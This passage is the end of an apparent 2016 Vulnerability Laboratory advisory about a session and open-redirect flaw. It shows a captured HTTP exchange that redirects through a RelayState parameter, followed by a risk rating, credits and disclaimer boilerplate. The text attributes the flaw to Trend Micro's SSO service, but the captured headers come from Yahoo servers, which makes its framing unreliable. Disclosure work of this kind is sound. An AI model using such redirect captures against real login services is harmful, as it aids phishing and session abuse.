pentityid%3Dmyaccount-sp%26cookieTime%3D1454068202%26RelayState%3Dhttps%
253A%252F%252Fyahoo.com%252Fmy_account%252F]
Cookie[B=]
Connection[keep-alive]
Response Headers:
Date[Fri, 29 Jan 2016 11:52:31 GMT]
Via[https/1.1 ir6.fp.ne1.yahoo.com (ApacheTrafficServer)]
Server[ATS]
Location[https://www.yahoo.com/my_account/]
Content-Type[text/html]
Content-Language[en]
Cache-Control[no-store, no-cache]

y-trace[BAEAQAAAAAAmoBYDWfT3qwAAAAAAAAAAbpfxk8XLzrgAAAAAAAAAAAAFKnerkc.N
AAUqd6uR22UgXJ6WAAAAAA--]
Content-Length[382]
X-Firefox-Spdy[h2]

Security Risk:
==============
The security risk of the session web and redirect vulnerability in the
Trend Micro SSO online service web-application is estimated as high.
(CVSS 6.5)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [Evolution
Security GmbH]
[http://www.vulnerability-lab.com/show.php?user=Hadji%20Samir]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability
for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if
Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages.
Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not
apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with
fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] -
research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: magazine.vulnerability-db.com -
vulnerability-lab.com/contact.php -
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab -
facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are
reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or
managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a
permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution
Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
